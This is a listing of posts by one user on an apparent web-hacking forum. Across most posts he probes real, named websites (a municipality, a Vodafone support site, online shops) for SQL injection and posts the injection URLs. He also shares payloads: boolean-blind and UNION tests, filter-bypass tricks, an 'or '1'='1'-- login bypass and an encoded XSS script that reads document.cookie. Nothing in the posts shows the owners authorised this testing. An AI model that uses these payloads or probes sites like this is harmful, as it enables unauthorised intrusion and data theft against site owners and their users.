sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Current Page: 1 of 2
Results 1 - 30 of 31
1 year ago
Nerder
Hello everybody, I found 2 different SQLIA in a website. The SQLIA is POST method type and affects the login form. The first one is: Type:boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: account=-4241' OR (1251=1251)#&password=test This one is a pretty simple query, but it returns something strange, cause if I try for examp
Forum: SQL and Code Injection
1 year ago
Nerder
Welcome to .Blowbrain, this is a simple game of logic, encryption and hacking, which will be used to measure your skills in these specific fields. On the homepage you can get your own encrypted code. Your task is to decrypt this code, overcoming the difficulties you will find in your path. When you find the solution, just click on the brain and use the form to send us the random nu
Forum: News and Links
1 year ago
Nerder
Great! But I wanna learn how u can do that. This Dir Traversal is SICK!
Forum: SQL and Code Injection
1 year ago
Nerder
Hello everyone, it's been a couple of days that I've been trying to exploit this web application, coded in Perl. Has someone already tried to do something similar? I hope for fast help. Thx in advance. This one is a simple dork, many websites use this application and every one has the same vulnz: http://goo.gl/cgnXG this is the error that I found: http://imgur.com/19kk2Q5 *Edit: corrected some errors.
Forum: SQL and Code Injection
1 year ago
Nerder
try to use -1 trim(union)%a0+trim(select)+1,2,3--
Forum: SQL and Code Injection
1 year ago
Nerder
2 years ago
Nerder
I have tried it this way but the SQLi doesn't work. If u wanna try: www.ilmessaggero.it/dilloalmessaggero.php?ctc='1
Forum: SQL and Code Injection
2 years ago
Nerder
Hi, I have found a SQLI vulnz in a website, but the error that it shows me is: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 and 1=1, 20' at line 1" I think that the end of the query is for example: LIMIT $var ,20; if I try to insert some query, it does not work because there's a syntax error like th
Forum: SQL and Code Injection
2 years ago
Nerder
I have found some vulnz on this web site, contact me in private. bye
Forum: SQL and Code Injection
2 years ago
Nerder
http://www.costruttori.it/admin/ when I put a ' this page returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 /admin/index.asp, line 23 it's vulnerable?
Forum: SQL and Code Injection
2 years ago
Nerder
nobody can solve?
Forum: SQL and Code Injection
2 years ago
Nerder
up PLS
Forum: SQL and Code Injection
2 years ago
Nerder
http://www.vizaginfo.com/others/edu/pgcolleges.asp?id='19 the back-end DBMS is MySQL, but it's hard filtered. I tried a lot of ways to bypass this, but for me it's really impossible! Thx Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
It's a BLIND. To bypass the filter use /*!*/ bye.
Forum: SQL and Code Injection
2 years ago
Nerder
up please
Forum: SQL and Code Injection
2 years ago
Nerder
http://www.signal4you.com/index.php?option=com_content&task=view&id=926+and+1=1 http://www.signal4you.com/index.php?option=com_content&task=view&id=926+and+1=2 It's Joomla CMS, and this variable is not vulnerable. Search for the Joomla exploit on this website: http://www.joomlaexploit.com/ and test your web site. BYE! NERDER
Forum: SQL and Code Injection
2 years ago
Nerder
I tried a lot of ways, but for me it isn't vulnerable.... I'm sorry
Forum: SQL and Code Injection
2 years ago
Nerder
http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=2 http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=1 http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=0 How is it possible?
Forum: SQL and Code Injection
2 years ago
Nerder
There are a lot of ways to bypass captcha, try to search on yt, because there are different types of captcha and different ways to bypass. Bye Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
I think that it is vulnerable because when I try to put in a false condition such as AND 1=2 the page changes http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=1 http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=2 and when I try to inject an "ORDER BY" +query http://assistenza.vodafone.it/content/sea
Forum: SQL and Code Injection
2 years ago
Nerder
I have tried this simple way: http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+and+'lol'='lol'/ http://gadgets.shop.it/gadgets/1-hotelcheque-daydreams-vacanze-da-sogno-/dettaglio/id-2343895+and+'lol'='asd'/ I think that it's vulnerable but I'm not sure... Could anyone solve my question? Thx Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
In MySQL v3 UNION does not exist...
Forum: SQL and Code Injection
2 years ago
Nerder
Siiick... this WAF was very hard! I tried to bypass it for one day!!!
Forum: SQL and Code Injection
2 years ago
Nerder
I tried a lot of ways, but for me it's not vuln... Ps: the server is very busy.
Forum: SQL and Code Injection
2 years ago
Nerder
It's vuln, it's a simple Error Based SQLIA... I have found a lot of vulnz on this site and on this server. Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
Hi, the SQLi is this: http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine='11 But it's so strange because when I tried to find the columns with ORDER BY (http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine=11+order+by+1--) the error that it printed was different from usual. But trying to increase the value of the variable "s_ordine, w
Forum: SQL and Code Injection
2 years ago
Nerder
Thx a lot, I dunno a lot of things about SQL injection in Opera DBMS.
Forum: SQL and Code Injection
2 years ago
Nerder
This is the vulnerable variable: www.comune.taranto.it/servizi/pagina.php?id=11238 I have tried many ways to bypass the filter, but none have been successful. The columns are 6: http://www.comune.taranto.it/servizi/pagina.php?id=1123+order+by+6-- http://www.comune.taranto.it/servizi/pagina.php?id=1123+order+by+7-- Help me pls. Nerder
Forum: SQL and Code Injection
2 years ago
Nerder
For me this form is not vulnerable to this type of SQL injection, try other vars. I have found a lot of these: ************************************************************* www.ptudep.org/regional-center1.asp?zone=Dist. of Faridkot, Mansa and Bathinda&rc_stream=IT%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%
Forum: SQL and Code Injection
2 years ago
Nerder
Try username: admin password: 'or '1'='1'-- but it is not guaranteed to work; this kind of bug is hard to find functional because it is one of the simplest types of SQL injection, and is almost always fixed
Forum: SQL and Code Injection